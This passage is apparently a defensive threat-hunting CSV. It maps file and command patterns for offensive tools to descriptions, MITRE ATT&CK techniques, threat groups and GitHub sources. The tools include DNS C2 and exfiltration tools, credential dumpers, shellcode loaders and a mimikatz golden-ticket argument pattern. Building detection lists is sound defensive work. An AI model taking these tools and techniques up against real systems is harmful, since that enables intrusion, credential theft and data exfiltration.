+"*/dllexploit.exe*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/DllExport.bat*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*/DLL-Hijack*","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","1","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z" +"*/DllNotificationInjection.git*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*/DllProxy.git*","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","16","5","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" +"*/dlls/c2.c*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/dns_grabber.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/dns_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/dns-blacklist.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-cache-snoop.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dnscan.git*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/dnscan.py*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*/dnscat.c*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*/dnscat2.git*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*/dns-check-zone.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-client-subnet-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dnscnc.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" +"*/dns-fuzz.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-ip6-arpa-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-nsec3-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-nsec-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-nsid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/DNS-Persist/*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*/dns-random-srcport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-random-txid.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-recursion.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-service-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dnsspoof.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" +"*/dns-srv-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dnsteal*","offensive_tool_keyword","dnsteal","This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.","T1048.003 - T1568.002 - T1573.002","TA0010 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/m57/dnsteal","1","1","N/A","N/A","10","1378","236","2022-02-03T11:04:49Z","2015-08-11T17:02:58Z" +"*/dnstool.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/dns-update.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-zeustracker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dns-zone-transfer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dobin/avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*/docker-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/DocPlz.git*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/DocsPLZ.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/DocsPLZ.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/documentation-c2/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/documentation-payload/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Doge-Loader/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" +"*/DoHC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/DoHC2.git*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/DoHC2/*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/domain:* /sid:* /sids:* /rc4:* /user:* /service:krbtgt /target:*.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Using domain trust key From the DC dump the hash of the currentdomain\targetdomain$ trust account using Mimikatz (e.g. with LSADump or DCSync). Then using this trust key and the domain SIDs. forge an inter-realm TGT using Mimikatz adding the SID for the target domains enterprise admins group to our SID history.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*/domain_analyzer.git*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*/domain_analyzer:latest*","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","0","N/A","6","10","1831","259","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" +"*/domainhunter*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","1","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" +"*/DomainRecon/*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/domcon-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/domcon-cmd.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Dome.git*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*/domino-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/dompdf-rce*","offensive_tool_keyword","POC","This repository contains a vulnerable demo application using dompdf 1.2.0 and an exploit that achieves remote code execution via a ttf+php polyglot file.","T1203 - T1204","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/positive-security/dompdf-rce","1","1","N/A","N/A","2","170","69","2022-03-17T18:05:07Z","2022-03-14T19:51:06Z" +"*/DonPAPI.git*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/DonPAPI.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/donut *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/donut.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/donut.git","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/Donut_Linux*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*/Donut_Windows*","offensive_tool_keyword","HardHatC2","A C# Command & Control 